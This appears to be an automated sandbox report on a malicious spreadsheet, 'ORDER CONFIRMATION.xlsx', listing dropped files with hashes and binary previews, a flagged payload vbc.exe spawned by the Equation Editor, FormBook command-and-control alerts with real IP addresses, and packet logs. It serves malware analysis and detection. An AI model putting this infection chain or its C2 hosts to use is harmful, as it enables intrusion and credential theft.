                                                                                      Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83C4F71D.jpeg
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                                                                                      Category:dropped
                                                                                      Size (bytes):14198
                                                                                      Entropy (8bit):7.916688725116637
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                                                                                      MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                                                                                      SHA1:72CA86D260330FC32246D28349C07933E427065D
                                                                                      SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                                                                                      SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                                                                                      Malicious:false
                                                                                      Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B4ED7E41.jpeg
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
                                                                                      Category:dropped
                                                                                      Size (bytes):7006
                                                                                      Entropy (8bit):7.000232770071406
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
                                                                                      MD5:971312D4A6C9BE9B496160215FE59C19
                                                                                      SHA1:D8AA41C7D43DAAEA305F50ACF0B34901486438BE
                                                                                      SHA-256:4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
                                                                                      SHA-512:618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
                                                                                      Malicious:false
                                                                                      Preview: ......JFIF..............Exif..MM.*......@......../..@..................C...........................$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C3FA08B4.jpeg
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                                                                      Category:dropped
                                                                                      Size (bytes):85020
                                                                                      Entropy (8bit):7.2472785111025875
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                                                                      MD5:738BDB90A9D8929A5FB2D06775F3336F
                                                                                      SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                                                                      SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                                                                      SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                                                                      Malicious:false
                                                                                      Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C4E1B898.jpeg
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
                                                                                      Category:dropped
                                                                                      Size (bytes):7006
                                                                                      Entropy (8bit):7.000232770071406
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
                                                                                      MD5:971312D4A6C9BE9B496160215FE59C19
                                                                                      SHA1:D8AA41C7D43DAAEA305F50ACF0B34901486438BE
                                                                                      SHA-256:4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
                                                                                      SHA-512:618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
                                                                                      Malicious:false
                                                                                      Preview: ......JFIF..............Exif..MM.*......@......../..@..................C...........................$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CFE3BF36.emf
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                      Category:dropped
                                                                                      Size (bytes):648132
                                                                                      Entropy (8bit):2.8123866129936412
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:M34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:+4UcLe0JOcXuunhqcS
                                                                                      MD5:113F32E1934BC0E35EEE5FF818BE29A2
                                                                                      SHA1:5A8B1604EE71AB705333F8801B4257ABFFCD0201
                                                                                      SHA-256:DEDBE06A88A213D59E39F84939526B4ECCAD8ED4EC26BD9FE3CD748F33090511
                                                                                      SHA-512:4D2D418011596BE9A4F05BA424016F22B8FFBEBA7D552A17D722D42C6BA2D3ACE88BECD19E13B488AF22EC6731AA4ADC565F3A9017918646099D859597D9D3F1
                                                                                      Malicious:false
                                                                                      Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................X$.......-z.X.@..%...h....................N0Z............x........N0Z........ ....y.X........ ............z.X............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i...............X.......<..............vdv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D6282740.png
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):33795
                                                                                      Entropy (8bit):7.909466841535462
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
                                                                                      MD5:613C306C3CC7C3367595D71BEECD5DE4
                                                                                      SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
                                                                                      SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
                                                                                      SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
                                                                                      Malicious:false
                                                                                      Preview: .PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."*(.G.L.{'?..z.w.93..".........~....06|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{.*..=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F5DAEFB9.png
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):84203
                                                                                      Entropy (8bit):7.979766688932294
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                                                                                      MD5:208FD40D2F72D9AED77A86A44782E9E2
                                                                                      SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                                                                                      SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                                                                                      SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                                                                                      Malicious:false
                                                                                      Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F90639BF.emf
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                      Category:dropped
                                                                                      Size (bytes):7788
                                                                                      Entropy (8bit):5.523444764822477
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:wHCHOvlJaX1/0qMfZoL/GuoOfaDda/ZbjsSZdb3Cim3n+KeXI:wHTrZuloOSGZboS/C93n+KuI
                                                                                      MD5:19CEE3A6741FA847BB3B6049C6D44989
                                                                                      SHA1:D3AB8B9DE9780CD057FC1E210C47533A2E3EA704
                                                                                      SHA-256:DF50928E8F40F0258DA68BFFD210760789C670101AFC17CC6C8334DD0313A66F
                                                                                      SHA-512:2C7B73617C55D99B3C70ECB8B0904A056AEDEF193066208A514FAD02B6C5F53F803FC196E40C72DB03EB4980314305FF3D53342117623F711EE97967EFD9E4AE
                                                                                      Malicious:false
                                                                                      Preview: ....l...).......u...<.........../....... EMF....l...........................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I.....................................................6.).X.....{.d...........................p....\.............|....p.......<5.u..p....`.p....$y.w............8.....w....$.....r.d...........^.p.....^.p................-...d...<.w................<.9u.Z.v....X.\...............................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .........................................................................................................................................................................................................................................HD>^JHCcNJFfNJFiPMHlRPJoTPLrWQLvYRPxZUR{]XP~]WS.^ZS.`[T.c\U.e^U.e]W.g`Y.hbY.j`Y.ib\.ld].kd].nd^.nf^.
                                                                                      C:\Users\user\Desktop\~$ORDER CONFIRMATION.xlsx
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):330
                                                                                      Entropy (8bit):1.4377382811115937
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                      MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                      SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                      SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                      SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                      Malicious:true
                                                                                      Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                      C:\Users\Public\vbc.exe
                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):556544
                                                                                      Entropy (8bit):7.182791197610268
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:7WHCM2K4Cz8liFBdgtM6lf2vo45Rm5fv1zCln:h3CzeiDdIMAfEofftzk
                                                                                      MD5:989933E361010648C467C6D7B6C2D812
                                                                                      SHA1:3BD47D097B8CD69083445EB0417B0059FA806542
                                                                                      SHA-256:34A89EDA5DD4AEF3EFB096011F27BBA7354B4C624D5DC01F4B43A18AC42D6AF4
                                                                                      SHA-512:F98B8337F527B49A4E5BD659CD6264D22F43C31EAAB55CCA4BF79EE2C5C5405D5CD78D1176759A0E0287E5FEB82675EF0D73DDA918FB9289ACC9D84DA466C60F
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6...............0..t.............. ........@.. ....................................@.................................x...O...................................\................................................ ............... ..H............text....s... ...t.................. ..`.rsrc................v..............@..@.reloc...............|..............@..B........................H........?..._......o...................................................~..$}......}......}.....(......*...$}......}......}.....(........}......}....*...0..O.........$}......}......}.....(........{....}......{....}......{....}......{....}....*:..{....(.....*...0..w..........R.{........,f.r...p(....-).r!..p(....-%.r-..p(....-%.r9..p(....-%+0..}....+'..J.{....XT+...J.{....XT+...J.{....XT+.*..0...........rE..p.+..*..0...........r...p.+..*..0..................+..*".(.....*....0..

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:CDFV2 Encrypted
                                                                                      Entropy (8bit):7.988579713004966
                                                                                      TrID:
                                                                                      • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                      File name:ORDER CONFIRMATION.xlsx
                                                                                      File size:597504
                                                                                      MD5:e1e18c326feb4aea3a983f390e0e36c2
                                                                                      SHA1:7d0abdd1c61dac8dfb411fde050381149fa1aaff
                                                                                      SHA256:a53f9cefce2fc02da9726d54387b05952a3956b9da65c6927c96250b44099d9a
                                                                                      SHA512:60b789ed55e1b4129b6cb7a9f57e463cb4f21a77ba0f9060269618df6c0035c7bd70e8fe8fabb8ca44435f098acbf9f38d6a7aead6f7a4bf7202eced0592b416
                                                                                      SSDEEP:12288:52/yYOLyJMy9tyEqnF8VPv8+BRZlJf+jgGpVABfGiggRBZ:52/Tg+ryGVPv3ZlF+jgGpVAlGqR7
                                                                                      File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                      File Icon

                                                                                      Icon Hash:e4e2aa8aa4b4bcb4

                                                                                      Network Behavior

                                                                                      Snort IDS Alerts

                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                      09/15/21-11:18:05.138832TCP1201ATTACK-RESPONSES 403 Forbidden804916934.102.136.180192.168.2.22
                                                                                      09/15/21-11:18:10.217119TCP2031453ET TROJAN FormBook CnC Checkin (GET)4917080192.168.2.2234.98.99.30
                                                                                      09/15/21-11:18:10.217119TCP2031449ET TROJAN FormBook CnC Checkin (GET)4917080192.168.2.2234.98.99.30
                                                                                      09/15/21-11:18:10.217119TCP2031412ET TROJAN FormBook CnC Checkin (GET)4917080192.168.2.2234.98.99.30
                                                                                      09/15/21-11:18:10.331685TCP1201ATTACK-RESPONSES 403 Forbidden804917034.98.99.30192.168.2.22
                                                                                      09/15/21-11:18:20.416021TCP2031453ET TROJAN FormBook CnC Checkin (GET)4917180192.168.2.2234.102.136.180
                                                                                      09/15/21-11:18:20.416021TCP2031449ET TROJAN FormBook CnC Checkin (GET)4917180192.168.2.2234.102.136.180
                                                                                      09/15/21-11:18:20.416021TCP2031412ET TROJAN FormBook CnC Checkin (GET)4917180192.168.2.2234.102.136.180
                                                                                      09/15/21-11:18:20.531202TCP1201ATTACK-RESPONSES 403 Forbidden804917134.102.136.180192.168.2.22
                                                                                      09/15/21-11:18:30.822018TCP2031453ET TROJAN FormBook CnC Checkin (GET)4917380192.168.2.22184.168.131.241
                                                                                      09/15/21-11:18:30.822018TCP2031449ET TROJAN FormBook CnC Checkin (GET)4917380192.168.2.22184.168.131.241
                                                                                      09/15/21-11:18:30.822018TCP2031412ET TROJAN FormBook CnC Checkin (GET)4917380192.168.2.22184.168.131.241
                                                                                      09/15/21-11:19:13.272679TCP1201ATTACK-RESPONSES 403 Forbidden804917634.102.136.180192.168.2.22
                                                                                      09/15/21-11:19:54.712455TCP2031453ET TROJAN FormBook CnC Checkin (GET)4918080192.168.2.2234.102.136.180
                                                                                      09/15/21-11:19:54.712455TCP2031449ET TROJAN FormBook CnC Checkin (GET)4918080192.168.2.2234.102.136.180
                                                                                      09/15/21-11:19:54.712455TCP2031412ET TROJAN FormBook CnC Checkin (GET)4918080192.168.2.2234.102.136.180
                                                                                      09/15/21-11:19:54.827491TCP1201ATTACK-RESPONSES 403 Forbidden804918034.102.136.180192.168.2.22
                                                                                      09/15/21-11:20:05.010582TCP2031453ET TROJAN FormBook CnC Checkin (GET)4918280192.168.2.2234.102.136.180
                                                                                      09/15/21-11:20:05.010582TCP2031449ET TROJAN FormBook CnC Checkin (GET)4918280192.168.2.2234.102.136.180
                                                                                      09/15/21-11:20:05.010582TCP2031412ET TROJAN FormBook CnC Checkin (GET)4918280192.168.2.2234.102.136.180
                                                                                      09/15/21-11:20:05.125579TCP1201ATTACK-RESPONSES 403 Forbidden804918234.102.136.180192.168.2.22
                                                                                      09/15/21-11:20:15.480022TCP1201ATTACK-RESPONSES 403 Forbidden804918434.102.136.180192.168.2.22
                                                                                      09/15/21-11:20:20.496012TCP2031453ET TROJAN FormBook CnC Checkin (GET)4918580192.168.2.2234.98.99.30
                                                                                      09/15/21-11:20:20.496012TCP2031449ET TROJAN FormBook CnC Checkin (GET)4918580192.168.2.2234.98.99.30
                                                                                      09/15/21-11:20:20.496012TCP2031412ET TROJAN FormBook CnC Checkin (GET)4918580192.168.2.2234.98.99.30
                                                                                      09/15/21-11:20:20.611011TCP1201ATTACK-RESPONSES 403 Forbidden804918534.98.99.30192.168.2.22
                                                                                      09/15/21-11:20:30.639824TCP2031453ET TROJAN FormBook CnC Checkin (GET)4918680192.168.2.2234.102.136.180
                                                                                      09/15/21-11:20:30.639824TCP2031449ET TROJAN FormBook CnC Checkin (GET)4918680192.168.2.2234.102.136.180
                                                                                      09/15/21-11:20:30.639824TCP2031412ET TROJAN FormBook CnC Checkin (GET)4918680192.168.2.2234.102.136.180
                                                                                      09/15/21-11:20:30.756136TCP1201ATTACK-RESPONSES 403 Forbidden804918634.102.136.180192.168.2.22
                                                                                      09/15/21-11:20:49.990019TCP2031453ET TROJAN FormBook CnC Checkin (GET)4918880192.168.2.22184.168.131.241
                                                                                      09/15/21-11:20:49.990019TCP2031449ET TROJAN FormBook CnC Checkin (GET)4918880192.168.2.22184.168.131.241
                                                                                      09/15/21-11:20:49.990019TCP2031412ET TROJAN FormBook CnC Checkin (GET)4918880192.168.2.22184.168.131.241
                                                                                      09/15/21-11:22:05.612250TCP1201ATTACK-RESPONSES 403 Forbidden804919134.102.136.180192.168.2.22
                                                                                      09/15/21-11:22:43.718801TCP2031453ET TROJAN FormBook CnC Checkin (GET)4919580192.168.2.2234.102.136.180
                                                                                      09/15/21-11:22:43.718801TCP2031449ET TROJAN FormBook CnC Checkin (GET)4919580192.168.2.2234.102.136.180
                                                                                      09/15/21-11:22:43.718801TCP2031412ET TROJAN FormBook CnC Checkin (GET)4919580192.168.2.2234.102.136.180
                                                                                      09/15/21-11:22:43.833789TCP1201ATTACK-RESPONSES 403 Forbidden804919534.102.136.180192.168.2.22
                                                                                      09/15/21-11:22:53.937608TCP2031453ET TROJAN FormBook CnC Checkin (GET)4919780192.168.2.2234.102.136.180
                                                                                      09/15/21-11:22:53.937608TCP2031449ET TROJAN FormBook CnC Checkin (GET)4919780192.168.2.2234.102.136.180
                                                                                      09/15/21-11:22:53.937608TCP2031412ET TROJAN FormBook CnC Checkin (GET)4919780192.168.2.2234.102.136.180
                                                                                      09/15/21-11:22:54.053650TCP1201ATTACK-RESPONSES 403 Forbidden804919734.102.136.180192.168.2.22
                                                                                      09/15/21-11:23:04.410658TCP1201ATTACK-RESPONSES 403 Forbidden804919934.102.136.180192.168.2.22
                                                                                      09/15/21-11:23:09.429910TCP2031453ET TROJAN FormBook CnC Checkin (GET)4920080192.168.2.2234.98.99.30
                                                                                      09/15/21-11:23:09.429910TCP2031449ET TROJAN FormBook CnC Checkin (GET)4920080192.168.2.2234.98.99.30
                                                                                      09/15/21-11:23:09.429910TCP2031412ET TROJAN FormBook CnC Checkin (GET)4920080192.168.2.2234.98.99.30
                                                                                      09/15/21-11:23:09.545253TCP1201ATTACK-RESPONSES 403 Forbidden804920034.98.99.30192.168.2.22

                                                                                      Network Port Distribution

                                                                                      TCP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Sep 15, 2021 11:16:35.175262928 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.287193060 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.291636944 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.291671038 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.411237955 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.411433935 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.413852930 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.413883924 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.413907051 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.414019108 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.525995970 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.526036978 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.526066065 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.526093006 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.526125908 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.526148081 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.526154041 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.526170015 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.526187897 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.526190996 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.526194096 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.526211977 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.526226997 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.638143063 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.638185978 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.638216972 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.638246059 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.638278008 CEST8049167198.23.212.143192.168.2.22
